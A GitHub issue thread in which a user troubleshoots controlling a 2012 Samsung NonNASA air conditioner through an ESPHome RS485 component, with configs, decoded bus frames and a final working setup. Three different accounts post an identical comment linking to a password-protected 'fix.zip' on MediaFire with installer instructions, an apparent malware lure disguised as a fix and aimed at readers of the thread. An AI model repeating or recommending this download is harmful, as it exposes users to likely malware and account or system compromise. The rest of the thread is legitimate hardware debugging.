### ISSUE TITLE
[NonNASA] I cannot control device from HA but it's receiving data

### ISSUE THREAD

**Issue by ncapilla** [omerfaruk-aran/esphome_samsung_hvac_bus#168]
Hey @lanwin!

First of all, great work. Thank you so much for sharing it with the community!

I found this project and used it to integrate my old Samsung AC into Home Assistant. The AC unit's readings are working correctly, but I cannot set climate control values through HA.

A little bit of background here:

- My AC unit model is **Samsung NS100SDXEA**; because of the discovered address, I can say it is a NonNASA unit.
- I'm using the **M5STACK ATOM Lite** + **M5STACK ATOM RS-485** Base to connect HA with the AC unit.

This is the AC unit wiring schema. As mentioned in the documentation, I've used the F1, F2, V1, and V2 ports.
![IMG_9044](https://github.com/user-attachments/assets/37a3b9cb-d769-4130-b694-bf05adc7dc6c)

Here it is my configuration yaml
```yaml
esphome:
  name: samsung-ac
  friendly_name: Samsung AC

esp32:
  board: m5stack-atom

# Enable logging
logger:
  level: DEBUG
  logs:
    component: ERROR # Remove the "Your component takes to long to respond warning"

# Enable Home Assistant API
api:
  encryption:
    key: "XXXXXXX"

ota:
  - platform: esphome
    password: "XXXXXXX"

wifi:
  ssid: !secret wifi_ssid
  password: !secret wifi_password

  # Enable fallback hotspot (captive portal) in case wifi connection fails
  ap:
    ssid: "Samsung-Ac Fallback Hotspot"
    password: "XXXXXX"

captive_portal:

# Specify pins used by the board to comunicate with RS485 board - in this case M5STACK
uart:
  tx_pin: GPIO19
  rx_pin: GPIO22
  # For older devices it could also be 2400. But you should start with 9600.
  baud_rate: 9600
  parity: EVEN

## SAMSUNG AC CONFIGURATION

# Import custom component from GitHub
external_components:
  - source: github://lanwin/esphome_samsung_ac@stable
    components: [samsung_ac]

# Configuration of AC component
# Configuration of AC component
samsung_ac:
  # Prints the parsed message data to the log
  debug_log_messages: true
  # Prints the binary message data (HEX encoded) to the log
  debug_log_messages_raw: true

  devices:
    # For NonNASA devices it looks like this (with 2 indoor devices): 
    #   Indoor:  00, 01
    # You need this addresses for the the sections below. If you see only a "-" then you should visit the troubleshooting section in the readme. 

    # Repeat everything below for each indoor device address you see in your logs
    - address: "00" # Indoor device address 
      # Each property below is optional (climate, room_temperature etc.) - you can delete those which you dont need.
      # For the names I suggest to choose a combination of room name and the thing it controls. 
            
      # Creates climate control in Home Assistant. A climate control combines multiple of the controls below (like temperature, mode etc.)
      climate:
        name: "Aire acondicionado"

      # The controls directly below are all included in the climate control. Its adviced to only add the climate control and skip the extra controls.
      #room_temperature:
      #  name: "Temperatura salón"
      #target_temperature:
      #  name: "Temperatura objetivo"
      #power:
      #  name: "Potencia"
      #mode:
      #  name: "Modo"
```

This is a DEBUG log in which I deploy the config and try to turn on the AC from HA.
[logs_samsung-ac_run.txt](https://github.com/user-attachments/files/16747584/logs_samsung-ac_run.txt)

What I've tried so far (with no luck):
- Check the wiring -> It's ok
- Change baud_rate from 9600 to 2400 (some older hardware uses a lower baud rate) -> It stops reading data.
- add baud_rate: 0 to the logger section -> Nothing happens

I see no errors in the log, just some Warnings.
`[12:41:50][W][samsung_ac:171]: NonNASA: invalid crc - got 9 but should be 141: 32c800f8030934`

I'm happy to test anything. Do a fork, create a dev version and deploy it to the atom board and then create a PR to your repository.

I'm seeking guidance on where to start looking, file/function/method. Maybe I just misconfigured something, and you could point me to the error.

**Comment by Nanganator** [comment]
Sounds like the issue I have in #127. Seems like currently there is no fix.

**Comment by lanwin** [comment]
Hi @Nanganator, when you can see the correct readings, then the boud_rate and message system works. 

We currently have the problem that it seems there are different ways to be able to send the old AC specific messages before it accepts commands.

Can you try  enable non_nasa_keepalive and maybe switch to #stable branch und try that?

**Comment by Nanganator** [comment]
Hey @lanwin, I tried that in #127 but lost the ability to see the AC states in HA and just got the below on repeat endlessly in the logs of the ESP:

```[17:33:18][W][samsung_ac:080]: write 32d0c8d1d2000000000000001b34
[17:33:18][W][samsung_ac:080]: write 32d0c8d1d2000000000000001b34
[17:33:18][W][samsung_ac:080]: write 32d0c8d1d2000000000000001b34
[17:33:18][W][samsung_ac:080]: write 32d0c8d1d2000000000000001b34
[17:33:18][W][samsung_ac:080]: write 32d0c8d1d2000000000000001b34
[17:33:18][W][component:204]: Component samsung_ac took a long time for an operation (0.34 s).
[17:33:18][W][component:205]: Components should block for at most 20-30ms.
[17:33:18][W][samsung_ac:080]: write 32d0c8d1d2000000000000001b34
[17:33:19][W][samsung_ac:080]: write 32d0c8d1d2000000000000001b34
[17:33:19][W][samsung_ac:080]: write 32d0c8d1d2000000000000001b34
[17:33:19][W][samsung_ac:080]: write 32d0c8d1d2000000000000001b34
[17:33:19][W][component:204]: Component samsung_ac took a long time for an operation (0.27 s).
[17:33:19][W][component:205]: Components should block for at most 20-30ms. ```

I didn’t end up following up on #127 yet as I went travelling and have only just recently returned. Getting through my backlog of projects 😂

Don’t want to threadjack though as for all I know what ncapilla is experiencing could be a totally unrelated issue just with the same result. You guys just already commented a bunch of stuff to try so was adding my thread in here as a reference for him 😊

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lanwin** [comment]
Can you please try that https://github.com/lanwin/esphome_samsung_ac/discussions/66 and check if you are able to control your AC via the non NASA Version of SNET? 

And please check if you can control the device from this component right after you controlled it via SNET.

**Comment by Nanganator** [comment]
> Can you please try that #66 and check if you are able to control your AC via the non NASA Version of SNET?
> 
> And please check if you can control the device from this component right after you controlled it via SNET.

Sure. Will try give it a shot tonight.

**Comment by 2302114245** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ncapilla** [comment]
Ok, I've changed this in the configuration. main branch and the keepalive

```yaml
external_components:
  - source: github://lanwin/esphome_samsung_ac@main
    components: [samsung_ac]

# Configuration of AC component
# Configuration of AC component
samsung_ac:
  # For NonNASA devices the following option can be enabled to prevent the device from sleeping when idle. This allows
  # values like internal and external temperature to continue to be tracked when the device isn't in use.
  non_nasa_keepalive: true
```

There it is the log file. 
[logs_samsung-ac_run (1).txt](https://github.com/user-attachments/files/16749080/logs_samsung-ac_run.1.txt)

I've tried to turn it off
```
[15:15:21][D][climate:011]: 'Aire acondicionado' - Setting
[15:15:21][D][climate:015]:   Mode: OFF
```

I took a look at that SNET-Pro program but unfortunately I only have linux and mac machines at home. I will ask someone a windows machine to try it out.

**Comment by ncapilla** [comment]
TBH @lanwin, not sure if that's all or I missed something in your conversation with @Nanganator.

Cross conversations makes things really difficult 😓

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ncapilla** [comment]
Hey @lanwin 

I've tried this https://github.com/lanwin/esphome_samsung_ac/discussions/66

I successfully connected to the indoor unit and was able to read the data, but I couldn't control it. Could it be a wiring problem? If I'm reading the data correctly, I suppose the F1/F2 wires are appropriately positioned. One of them may not be connected correctly.

Here are some pictures of the SNET software
![image (2)](https://github.com/user-attachments/assets/01496463-1ac3-4b8c-be9f-335be879b6d1)
![image (1)](https://github.com/user-attachments/assets/3bec70bd-94c5-44c1-970a-21a88b18b72b)
![image](https://github.com/user-attachments/assets/89607476-59d7-4a54-8b05-608cd4fb2336)

**Comment by lanwin** [comment]
Hu, that is strange. Most of the time when reading worked, writing also works. But maybe you check that again. And non of the buttons does anything?

Can you please also check the "Disable Individal Control" checkbox. But I am not sure that helps.

And If you change the AC via remote, did the values here also change?

**Comment by ncapilla** [comment]
Hey @lanwin 

- I tried to check the "Disable Individual Control" checkbox, same result.
- I did change some values from my AC controller and the information didn't update in the S-NET software until I disconnected and connected again. The info is refreshing on the ESPHome.

Let me recap with all the info 👇🏻

[Up-to-date ESPHome logs of the test](https://github.com/user-attachments/files/16906963/logs_samsung-ac_run.txt)
[S-NET Software recording of the test](https://github.com/user-attachments/files/16906938/2024-09-06_11H-15M-48S-Inverter.RC.AC-1.dvr.zip)

This is my current configuration:
```yaml
esphome:
  name: samsung-ac
  friendly_name: Samsung AC

esp32:
  board: m5stack-atom

# Enable logging
logger:
  level: DEBUG
  logs:
    component: ERROR # Remove the "Your component takes to long to respond warning"

# Enable Home Assistant API
api:
  encryption:
    key: "XXXXXXX"

ota:
  - platform: esphome
    password: "XXXXXXX"

wifi:
  ssid: !secret wifi_ssid
  password: !secret wifi_password

  # Enable fallback hotspot (captive portal) in case wifi connection fails
  ap:
    ssid: "Samsung-Ac Fallback Hotspot"
    password: "XXXXXXX"

captive_portal:

# Specify pins used by the board to comunicate with RS485 board - in this case M5STACK
uart:
  tx_pin: GPIO19
  rx_pin: GPIO22
  # For older devices it could also be 2400. But you should start with 9600.
  baud_rate: 9600
  parity: EVEN

## SAMSUNG AC CONFIGURATION

# Import custom component from GitHub
external_components:
  - source: github://lanwin/esphome_samsung_ac@main
    components: [samsung_ac]
  - source: github://oxan/esphome-stream-server

stream_server:

# Configuration of AC component
# Configuration of AC component
samsung_ac:
  # For NonNASA devices the following option can be enabled to prevent the device from sleeping when idle. This allows
  # values like internal and external temperature to continue to be tracked when the device isn't in use.
  non_nasa_keepalive: true
  # Prints the parsed message data to the log
  debug_log_messages: true
  # Prints the binary message data (HEX encoded) to the log
  debug_log_messages_raw: true

  devices:
    # For NonNASA devices it looks like this (with 2 indoor devices): 
    #   Indoor:  00, 01
    # You need this addresses for the the sections below. If you see only a "-" then you should visit the troubleshooting section in the readme. 

    # Repeat everything below for each indoor device address you see in your logs
    - address: "00" # Indoor device address 
      # Each property below is optional (climate, room_temperature etc.) - you can delete those which you dont need.
      # For the names I suggest to choose a combination of room name and the thing it controls. 
            
      # Creates climate control in Home Assistant. A climate control combines multiple of the controls below (like temperature, mode etc.)
      climate:
        name: "Aire acondicionado"

      # The controls directly below are all included in the climate control. Its adviced to only add the climate control and skip the extra controls.
      #room_temperature:
      #  name: "Temperatura salón"
      #target_temperature:
      #  name: "Temperatura objetivo"
      #power:
      #  name: "Potencia"
      #mode:
      #  name: "Modo"
```

What I've tried so far (with no luck):

- Check the wiring -> It's ok
- Change baud_rate from 9600 to 2400 (some older hardware uses a lower baud rate) -> It stops reading data.
- add baud_rate: 0 to the logger section -> Nothing happens
- [S-NET PRO] Try to control the indoor unit using S-NET PRO (Non-Nasa) https://github.com/lanwin/esphome_samsung_ac/discussions/66 -> I can read the data but I cannot control the unit.
- [S-NET PRO] I tried to check the "Disable Individual Control" checkbox, same result.
- [S-NET PRO] I did change some values from my AC controller and the information didn't update in the S-NET software until I disconnected and connected again. The info is refreshing on the ESPHome.

**Comment by ncapilla** [comment]
Hi @lanwin,

I've made some additional attempts to troubleshoot the issue, and I'd like to provide an update.

First, I removed the `samsung_ac` plugin from my configuration and left only the `stream_server` plugin for testing purposes. This seemed to provide more stability during my tests with the SNET-PRO software.

I tried using the SNET-PRO software from Samsung to control the air conditioning unit. I tested every AC model available in the application, and while I could receive data and see the information update for most models, I was unable to control the unit.

I inspected the wiring and noticed that the wired controller for my AC unit had thinner cables. To rule out any potential interference issues, I decided to replace those cables, but the result remained the same.

During the wiring inspection, I noticed that my home controller is connected to the F3, F4, V1, and V2 ports, so I tried connecting to those ports as well. When attempting to connect with SNET-PRO on those ports, the only change was that I could only read information by selecting a specific model from the list, which I assume is the correct model. However, I still couldn't control the unit.

After that, I tried alternating the connections between F3 and F4, as well as F1 and F2, but that only resulted in everything stopping to work.

I'm honestly out of ideas on what else to try. If I can't manage to control the unit from the SNET-PRO software, I don't think we'll be able to make progress with the plugin either.

I would greatly appreciate any additional suggestions or guidance you might have. Please let me know if you need any further information or logs from my end.

**Comment by lanwin** [comment]
From what I know. As far as you can read data, there wiring is ok. Otherwise you would get no data.

**Comment by ncapilla** [comment]
> Wall that is sad. This makes it a lot more difficult. Maybe you could connect to F3,F4 and turn on debug message logging and capture the logs right from the second you changed one value on your home controller.
> 
> From what I know is that F3,F4 works the same but the messages could be different. But be aware that F3,F4 uses a different baud rate (as far as I know).

I'll try that. I'm open to anything, hehe. I'll let you know the results.

Thanks!!

**Comment by ncapilla** [comment]
I'm still trying to find some time in order to test this approach suggested by @lanwin. I wouldn't say it's completed

> Wall that is sad. This makes it a lot more difficult. Maybe you could connect to F3,F4 and turn on debug message logging and capture the logs right from the second you changed one value on your home controller.
> 
> From what I know is that F3,F4 works the same but the messages could be different. But be aware that F3,F4 uses a different baud rate (as far as I know).

**Comment by Nanganator** [comment]
Hey @omerfaruk-aran. Thanks for re-opening this one. Anything we can do to help test or diagnose?

**Comment by wifi75** [comment]
> Hu, that is strange. Most of the time when reading worked, writing also works. But maybe you check that again. And non of the buttons does anything?
> 
> Can you please also check the "Disable Individal Control" checkbox. But I am not sure that helps.
> 
> And If you change the AC via remote, did the values here also change?

I'm trying your non-nasa configuration downloaded from here:
https://github.com/jbekkema/esphome_samsung_ac/blob/non_nasa_stable_ui/example.yaml
but it doesn't even allow me to validate it because this error appears...

![Image](https://github.com/user-attachments/assets/43affce5-43aa-49db-94fd-77809ded8141)

and yet I copied from the row of your yaml file and pasted it into my configuration, deleting my previous one obviously.
what can I do?

**Comment by Nanganator** [comment]
The solution is written in the error. You have “quiet” defined in there twice. You cannot simply copy and paste the example config. There are lots of duplicates in there. Read the comments in the yaml and look for the bits that say “ short” and “long”. You can only have one of them in and need to delete the other. in your case you need to remove one of the “quiet” configs as you currently have both the short vertion of the quiet config and the long version of the quiet config in there.

**Comment by wifi75** [comment]
> The solution is written in the error. You have “quiet” defined in there twice. You cannot simply copy and paste the example config. There are lots of duplicates in there. Read the comments in the yaml and look for the bits that say “ short” and “long”. You can only have one of them in and need to delete the other. in your case you need to remove one of the “quiet” configs as you currently have both the short vertion of the quiet config and the long version of the quiet config in there.


nothing to do I couldn't fix it.
![Image](https://github.com/user-attachments/assets/8a23a123-30db-4b64-a2db-112b69a58834)

**Comment by wifi75** [comment]
> I tuoi problemi non sono correlati a questo thread. Per favore, aprine uno nuovo.

it doesn't allow me to open new topics due to problems..
it doesn't matter I'll abandon the ability to configure these air conditioners.

Thanks and anyway

**Comment by wifi75** [comment]
> Your issues are not related to this thread. Please start a new one.

it doesn't allow me to open new topics due to problems..
it doesn't matter I'll abandon the ability to configure these air conditioners.

Thanks and anyway

**Comment by ncapilla** [comment]
## Update: Deep dive on Samsung NS100SDXEA (2012) — findings + potential path forward

After a lot of testing and research I want to share everything we found. This is long, sorry — I hope it helps others with older Samsung units.

---

### Setup

- **Unit**: Samsung NS100SDXEA (2012), NonNASA
- **Hardware**: M5Stack ATOM Lite + RS485 Base
- **Fork**: https://github.com/ncapilla/esphome_samsung_hvac_bus

---

### Finding 1: CmdC6 registration blocked for this model

This unit sends `control_status:0` in CmdC6. The original code only registers when `control_status == true`:

```cpp
// Original — blocks registration on this model:
if (nonpacket_.src == "c8" && nonpacket_.dst == "d0" && nonpacket_.commandC6.control_status == true)
```

Fix (branch [`fix/cmdC6-control-status`](https://github.com/ncapilla/esphome_samsung_hvac_bus/tree/fix/cmdC6-control-status)):

```cpp
// Fixed — presence of CmdC6 itself is sufficient:
if (nonpacket_.src == "c8" && nonpacket_.dst == "d0")
```

This is a clean 1-line fix on top of `main`. Happy to open a PR if useful.

---

### Finding 2: B0 control commands ignored on F1/F2

Even after fixing CmdC6 registration, this unit **ignores B0 control commands on F1/F2**. Confirmed by the complete absence of Cmd54 ACKs in the logs after sending commands from HA. The unit physically ignores the command — there's no error, just silence.

This appears to be a hardware limitation of this 2012 model. F1/F2 seems to be read-only for this unit.

---

### Finding 3: F3/F4 is the control bus — 2400 baud EVEN parity

The wall controller communicates on **F3/F4 at 2400 baud, EVEN parity**. Capturing that bus traffic revealed a completely different command flow:

- **WRC (0x84) → Indoor (0x20)**: `CmdA0` — settings/poll command
- **Indoor (0x20) → WRC (0x84)**: `Cmd50` — response with current state

Packet format is the same 14-byte NonNASA structure. CmdA0 data layout (confirmed against [DannyDeGaspari/Samsung-HVAC-buscontrol](https://github.com/DannyDeGaspari/Samsung-HVAC-buscontrol)):

| data byte | content |
|---|---|
| [4] | wind direction (0x1A = swing, 0x1F = off) |
| [5] | room temperature |
| [6] | bits [4:0] = target temp, bits [7:5] = fan speed (0=auto, 0x40=low, 0x80=med, 0xA0=high) |
| [7] | mode (0=auto, 1=cool, 2=dry, 3=fan, 4=heat) |
| [8] | power (0xC4=off, 0xF4=on) |

---

### Finding 4: Addressing — WRC=0x84, Indoor=0x20

DannyDeGaspari documents (and our captures confirm): **WRC address = 0x84, indoor = 0x20** (0x21 for second unit). This is opposite to what I initially assumed. Worth noting because `protocol.cpp` currently registers `"84"` as `AddressType::Indoor` — that may need revisiting.

---

### Finding 5: 300ms gap — coexistence with physical wall controller

This is the most interesting finding. From [DannyDeGaspari's README](https://github.com/DannyDeGaspari/Samsung-HVAC-buscontrol#tools):

> _"The wired remote control sends commands to all units in sequence and ends the communication with a command to destination address 0xAD, no reply is coming from any of the units on this one. I suspect the 0xAD address to be a broadcast address. Then there is a **300 ms gap** in the communication and then it all starts over. During this gap the tools make use of the bus to send their own commands. **The wired remote will not notice the presence of the other master** but it will take over the changed settings of the units when it polls their status."_

His `ac_control.py` implements this exactly: it waits for a packet addressed to `0xAD`, then immediately injects a `CmdA0` command using address `0x85` (a secondary master, different from the WRC at `0x84`). The indoor unit accepts it, and the WRC picks up the new state on its next poll.

**This means we can coexist with a physical wall controller** without MITM or disconnecting it — just act as a secondary master (e.g., 0x85) on F3/F4, wait for the 0xAD packet, then inject CmdA0 during the 300ms gap.

---

### Current implementation

Branch [`feature/f3-f4-wired-controller`](https://github.com/ncapilla/esphome_samsung_hvac_bus/tree/feature/f3-f4-wired-controller) implements:
- F3/F4 decode of CmdA0/Cmd50
- `encode_as_cmd50()` for sending responses
- CmdC6 fix included

The current approach tries to act as the primary WRC (0x20 dst), which conflicts with a physical wall controller. The next step is to implement the secondary master approach (src=0x85, wait for 0xAD, inject during 300ms gap) instead.

---

### Questions for maintainers

1. **CmdC6 fix**: Is removing the `control_status` check safe across all NonNASA models? We believe presence of CmdC6 is sufficient, but would appreciate confirmation before submitting a PR.

2. **Secondary master approach**: Would adding support for injecting CmdA0 during the 300ms gap (as a secondary F3/F4 master) be something the project would accept? This would be the only working control path for units that ignore B0 on F1/F2.

3. **Addressing**: Should `"84"` remain registered as `AddressType::Indoor` in `protocol.cpp`, or should it be `Controller`/`Other`? (It's the WRC address, not an indoor unit address.)

4. **Anyone else with this 2012-era model or similar F1/F2 B0 ignore behavior?** Would love to know if this is model-specific or more widespread.

Thanks to @lanwin and everyone contributing to this project. The protocol decode work here saved me weeks of reverse engineering.

**Comment by ncapilla** [comment]
**Update — additional findings (still investigating):**

Unit: **NS100SDXEA** (2012, NonNASA, single-split ducted, ~10 kW). F1/F2 @ 9600 8E1. Indoor addr `00`, outdoor `c8`. Indoor option code `020010-100000-200000-300000`. Reading works fully; control commands are not acted on.

**1. ESPHome control + registration frames (never acknowledged):**
- Control: `32 D0 00 B0 1F 17 12 01 F4 21 00 00 AE 34` (`d0→00`, power on) — retried; indoor `Cmd20` power stays `0`.
- Registration: `32 D0 C8 D1 D2 00 00 00 00 00 00 00 1B 34` (`d0→c8`) — sent repeatedly. The outdoor only ever sends `32 C8 D0 C6 …` (CmdC6) back to `d0`, never any other frame / ack.

**2. S-NET Pro (Samsung's own NonNASA tool) — same result, byte-identical command:**
- Connected via a raw RS485↔TCP tap (no interface module; Tracking Info: indoor `00` present, "Interface Module" absent).
- Its control frame on "On": `32 D0 00 B0 1F 17 12 01 F4 21 00 00 AE 34` — byte-identical to ESPHome's. Same `D1 D2` registration spam. Unit ignores both; AC does not turn on. "Indoor Option Writer" is greyed out.

**3. SEG5 / control_status (indoor option code, set via wired-remote Menu 18):**
- SEG5 = "Use of central control / Wi-Fi kit usage".
- `SEG5=1` → outdoor polls `d0`: `32 C8 D0 C6 01 01 04 01 …` (control_status `1`); S-NET Pro shows "control mode".
- `SEG5=0` → `32 C8 D0 C6 00 …` (control_status `0`); S-NET Pro shows *"You cannot send commands. Please wait for participating in the communication."*

**4. Power-on tracking frames (captured during unit boot):**
```
00 33 43 D1 D0 D5 FF FF FF FF FF FF 19 19   (repeated; non-0x32 framing)
32 C8 00 FD 00 35 34
32 00 C8 FE 00 36 34
32 C8 EB F9 00 DA 34
32 C8 EB FB 01 00 00 00 00 00 00 00 D9 34
32 00 C8 FC …
```

**5. Controller present during power-on (ESP kept powered from a battery through an AC power-cycle):**
- With `SEG5=1`, the controller responded to the C6 poll in-slot (`32 D0 C8 C6 …`) and sent B0 throughout the unit's power-on tracking.
- The `00 33 43 D1 D0 D5 FF FF FF FF FF FF` frame stayed unchanged (the `d0` slot remained `FF`); the outdoor still never acknowledged the registration; AC did not turn on.

Still investigating.

**Comment by ncapilla** [comment]
**Investigation notes — F3/F4 wired-remote bus (sharing in case it helps others; still investigating):**

Separate from the F1/F2 outdoor bus (where my control frames aren't acted on), I rewired to the **F3/F4 wired-remote bus (2400 8E1)** and captured the real wired remote (MWR-WH00) controlling the unit, plus the power-on tracking.

**1. The wired remote controls via cmd `A0`; the indoor confirms with cmd `50`:**
```
32 84 20 A0 1F 18 12 01 F4 00 00 00 E4 34    WRC (84) -> indoor (20): A0 = change settings
32 20 84 50 1F 18 12 01 F4 00 00 00 14 34    indoor (20) -> WRC (84): 50 = confirm (echoes the settings)
32 84 AD D1 01 00 00 00 00 00 00 00 F9 34    WRC (84) -> broadcast (AD): D1 = end of cycle
```

**2. A0 data format (decoded by cycling temp / mode / fan / power on the remote):**
`32 84 20 A0 [1F 18 D3 D4 D5 00 00 00] CRC 34`
- `D3` = `(target_temp & 0x1F) | fanspeed` — low nibble = temperature (`0x12`=18 °C … `0x16`=22 °C); fan = `0x00` auto / `0x40` low / `0x80` mid / `0xA0` high.
- `D4` = mode (0–4).
- `D5` = power: `0xF4` = ON, `0xC4` = OFF.
- CRC = XOR of bytes [1..11].
- Example (ON, cool, 18 °C, fan auto): `32 84 20 A0 1F 18 12 01 F4 00 00 00 E4 34`.

**3. Power-on tracking (captured by keeping the ESP powered from a battery through an AC power-cycle):**
```
00 33 AF D1 D0 D5 FF FF FF FF FF FF 81 97        unit broadcasts tracking (non-0x32 framing; FF = empty controller slots)
32 84 00 FD 00 79 34  /  32 00 84 FE 00 7A 34    WRC (84) <-> indoor (00) FD/FE handshake
32 84 EB FB 02 00 ... 96 34  /  32 84 EB F9 00 96 34    WRC (84) internal FB/F9 handshakes
32 84 20 52 ...  /  32 20 84 52 49 4E 4E ...     then the WRC begins its normal Cmd52 poll cycle
```
(The `00 33 AF D1 D0 D5 FF...` tracking broadcast mirrors the F1/F2 boot frame `00 33 43 D1 D0 D5 FF...` from my earlier comment.)

Currently exploring whether a controller that **impersonates the registered wired-remote address (`0x84`)** can inject A0 commands and get the indoor's `50` confirmation (à la [DannyDeGaspari/Samsung-HVAC-buscontrol](https://github.com/DannyDeGaspari/Samsung-HVAC-buscontrol)) — i.e. without registering, by reusing the already-registered remote's address. Still investigating.

**Comment by ncapilla** [comment]
**✅ Resolved — full Home Assistant control achieved. This issue can be closed.** 🎉

For anyone hitting the same *"reads the bus perfectly but no command ever takes effect"* symptom on a single‑split / wired‑remote unit, here's the full story.

### Root cause: the RS485 transceiver, not the AC

My setup was an **M5Stack ATOM Lite + Atomic RS485 base (SP3485EE)**. It turns out that base was **corrupting every frame I transmitted.** Its cheap auto‑direction circuit (a discrete transistor that pulls DE) only actively drives the `0` bits and *releases* the `1` bits (relying on the bus bias), so the AC never received an intact frame from me — while **RX was always perfect** (the receiver doesn't depend on the driver).

That single fact invalidates a *lot* of earlier dead‑ends: every *"the unit ignores my B0 / registration never ACKs / F3‑F4 injection is silent / even S‑NET Pro can't control it"* conclusion was an artifact of corrupt TX. (S‑NET Pro was bridged through the same M5Stack, so it shared the same bad transceiver.) Nothing was ever wrong with the protocol, the addressing, or the unit.

### The fix

- **Hardware:** swapped the M5Stack for a **LILYGO T‑CAN485** (ESP32 + a proper RS485 transceiver), powered 5–12 V straight from the AC's V1/V2.
- **Bus:** F3/F4 wired‑remote bus, 2400 8E1.
- **Method:** inject `CmdA0` (à la [DannyDeGaspari/Samsung‑HVAC‑buscontrol](https://github.com/DannyDeGaspari/Samsung-HVAC-buscontrol)) **as the Sub wired remote `0x85`**, immediately after the wired‑remote controller's end‑of‑cycle `0xAD` broadcast. The indoor confirms each accepted command with `Cmd50` (`20→85`).
- **⚠️ Important:** injecting as the **Main `0x84`** works too, **but the real wall remote then throws Error E607 ("two main controllers") and locks up for a while.** Using the **Sub slot `0x85`** coexists cleanly — zero E607, the wall remote keeps working normally and adopts the changes.

**Result:** full climate control (on/off, mode, temp, fan) from HA, coexisting with the existing MWR‑WH00 wall remote.

### Config (LILYGO T‑CAN485)

Working branch with the F3/F4 immediate‑A0 injection (as Sub `0x85`): [`ncapilla/esphome_samsung_hvac_bus@feature/f3-f4-wired-controller`](https://github.com/ncapilla/esphome_samsung_hvac_bus/tree/feature/f3-f4-wired-controller)

```yaml
esp32:
  board: esp32dev

# T-CAN485 RS485 enable pins. inverted:true → their default (off) = physical HIGH = ENABLED,
# so you just declare them, no on_boot needed. The board auto-directs (proper chip) → no flow_control_pin.
output:
  - platform: gpio
    id: tcan_enable_chip
    pin: { number: GPIO19, inverted: true }
  - platform: gpio
    id: tcan_se_autodir
    pin: { number: GPIO17, inverted: true }
  - platform: gpio
    id: tcan_enable_5v
    pin: { number: GPIO16, inverted: true }

uart:
  tx_pin: GPIO22
  rx_pin: GPIO21
  baud_rate: 2400
  parity: EVEN

samsung_ac:
  devices:
    - address: "84"          # entity/state tracking; the branch injects control as Sub 0x85 internally
      climate:
        name: "Aire acondicionado"
```

### Wiring (T‑CAN485 ↔ indoor unit, F3/F4 connector)

| T‑CAN485 | AC |
|---|---|
| RS485 `A` | F3 |
| RS485 `B` | F4 |
| Power `+` (5–12 V) | V1 (+12 V) |
| Power `−` | V2 (GND) |

(If it reads garbage, swap A/B.)

---

**TL;DR:** if you can *read* the bus but no command ever takes effect, suspect your **RS485 transceiver before the AC** — a cheap auto‑direction module can corrupt TX while RX looks flawless. A proper transceiver + **Sub‑remote (`0x85`) `CmdA0` injection on F3/F4** gave me full, clean control. Thanks for the component! Closing. 🙏

**Comment by ncapilla** [comment]
**Follow-up — one important config detail I left out of the recipe above.**

The `CmdA0` injection must **not** fire in the exact instant the `0xAD` end-of-cycle frame is decoded. If it does (sub-millisecond), it collides with the tail of the `0xAD` still clearing the bus — the controller's DE release / our transceiver asserting on top of it — and the indoor silently drops the frame. It needs a **small guard delay (~5 ms)** after the `0xAD`.

This caused a subtle gotcha worth flagging: control can appear to **"only work with debug logging enabled."** That's because the debug logging happens to add ~3 ms of latency *before* the inject, which incidentally provided the guard. Turn debug off and it stops controlling — while reading keeps working perfectly. (Same code, only the logging config changed, with `refresh: always`, so it's not a cache thing — it's pure runtime timing.)

The branch handles it with a deterministic guard delay, reusing the existing **`non_nasa_tx_delay_ms`** option (defaults to 5 ms when unset; bump it from YAML if your bus needs more — no recompile):

```yaml
samsung_ac:
  non_nasa_tx_delay_ms: 5   # guard so the A0 inject lands just AFTER the 0xAD clears the bus
  devices:
    - address: "84"
      climate:
        name: "AC"
```

TL;DR: if you ever see *"reads perfectly, controls with debug on, doesn't with debug off"* — it's the **inject timing**, not the AC. A few ms of guard fixes it. 👍
